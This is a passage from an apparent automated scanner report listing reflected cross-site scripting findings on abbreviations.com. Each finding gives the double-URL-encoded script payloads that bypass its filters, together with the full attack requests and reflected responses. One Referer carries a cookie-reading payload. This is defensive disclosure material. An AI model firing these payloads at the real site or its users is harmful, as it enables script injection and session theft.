The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.css66679%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a4f7ab6f7 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:24:24 GMT
Content-Length: 27103


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does abbr.css66679"><script>alert(1)</script>9a4f7ab6f7 stand for?, What does abbr.css66679">
...[SNIP]...

4.411. http://www.abbreviations.com/abbr.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93dfb%253cscript%253ealert%25281%2529%253c%252fscript%253ea69817cc1a7 was submitted in the REST URL parameter 1. This input was echoed as 93dfb<script>alert(1)</script>a69817cc1a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.css93dfb%253cscript%253ealert%25281%2529%253c%252fscript%253ea69817cc1a7 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:24:53 GMT
Content-Length: 27061


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>a69817cc1a7";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbr.css93dfb<script>alert(1)</script>a69817cc1a7" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "abbr.css93dfb<script>
...[SNIP]...

4.412. http://www.abbreviations.com/abbr.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74516%2522%253balert%25281%2529%252f%252f44905aad793 was submitted in the REST URL parameter 1. This input was echoed as 74516";alert(1)//44905aad793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.css74516%2522%253balert%25281%2529%252f%252f44905aad793 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:24:38 GMT
Content-Length: 26744


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "abbr.css74516";alert(1)//44905aad793";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbr.css74516";alert(1)//44905aad793" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href
...[SNIP]...

4.413. http://www.abbreviations.com/abbr.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 73595%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9905ecb5304 was submitted in the REST URL parameter 1. This input was echoed as 73595</title><script>alert(1)</script>9905ecb5304 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.css73595%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9905ecb5304 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:25:18 GMT
Content-Length: 27311


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does abbr.css73595</title><script>alert(1)</script>9905ecb5304 stand for?</title>
...[SNIP]...

4.414. http://www.abbreviations.com/abbr.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5e15%2522%253balert%25281%2529%252f%252f7bcb080d8de was submitted in the REST URL parameter 1. This input was echoed as e5e15";alert(1)//7bcb080d8de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.jse5e15%2522%253balert%25281%2529%252f%252f7bcb080d8de HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:25:54 GMT
Content-Length: 26717


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "abbr.jse5e15";alert(1)//7bcb080d8de";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbr.jse5e15";alert(1)//7bcb080d8de" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

4.415. http://www.abbreviations.com/abbr.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c284a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7d67615d230 was submitted in the REST URL parameter 1. This input was echoed as c284a"><script>alert(1)</script>7d67615d230 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.jsc284a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7d67615d230 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:25:32 GMT
Content-Length: 27122


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does abbr.jsc284a"><script>alert(1)</script>7d67615d230 stand for?, What does abbr.jsc284a">
...[SNIP]...

4.416. http://www.abbreviations.com/abbr.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 66a46%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc47256e3b6 was submitted in the REST URL parameter 1. This input was echoed as 66a46</title><script>alert(1)</script>cc47256e3b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.js66a46%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc47256e3b6 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:27:12 GMT
Content-Length: 27284


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does abbr.js66a46</title><script>alert(1)</script>cc47256e3b6 stand for?</title>
...[SNIP]...

4.417. http://www.abbreviations.com/abbr.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99dbd%253cscript%253ealert%25281%2529%253c%252fscript%253e23471ee6b28 was submitted in the REST URL parameter 1. This input was echoed as 99dbd<script>alert(1)</script>23471ee6b28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.js99dbd%253cscript%253ealert%25281%2529%253c%252fscript%253e23471ee6b28 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:26:27 GMT
Content-Length: 27049


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>23471ee6b28";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbr.js99dbd<script>alert(1)</script>23471ee6b28" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "abbr.js99dbd<script>
...[SNIP]...

4.418. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14548%2522%253balert%25281%2529%252f%252fa75b5821976 was submitted in the REST URL parameter 1. This input was echoed as 14548";alert(1)//a75b5821976 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbreviations14548%2522%253balert%25281%2529%252f%252fa75b5821976/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:34:01 GMT
Connection: close
Content-Length: 26845


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "abbreviations14548";alert(1)//a75b5821976";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbreviations14548";alert(1)//a75b5821976" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.
...[SNIP]...

4.419. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 5e49c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97f972b3084 was submitted in the REST URL parameter 1. This input was echoed as 5e49c</title><script>alert(1)</script>97f972b3084 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbreviations5e49c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97f972b3084/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:37:12 GMT
Connection: close
Content-Length: 27412


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does abbreviations5e49c</title><script>alert(1)</script>97f972b3084 stand for?</title>
...[SNIP]...

4.420. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baf28%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73b2621bbdb was submitted in the REST URL parameter 1. This input was echoed as baf28"><script>alert(1)</script>73b2621bbdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbreviationsbaf28%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73b2621bbdb/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:32:57 GMT
Connection: close
Content-Length: 27284


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does abbreviationsbaf28"><script>alert(1)</script>73b2621bbdb stand for?, What does abbreviationsbaf28">
...[SNIP]...

4.421. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3533a%253cscript%253ealert%25281%2529%253c%252fscript%253e02ec5d2c02f was submitted in the REST URL parameter 1. This input was echoed as 3533a<script>alert(1)</script>02ec5d2c02f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbreviations3533a%253cscript%253ealert%25281%2529%253c%252fscript%253e02ec5d2c02f/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:35:33 GMT
Connection: close
Content-Length: 27211


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>02ec5d2c02f";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbreviations3533a<script>alert(1)</script>02ec5d2c02f" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "abbreviations3533a<script>
...[SNIP]...

4.422. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7370d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8f2cde6c5 was submitted in the REST URL parameter 1. This input was echoed as 7370d"><script>alert(1)</script>a8f2cde6c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

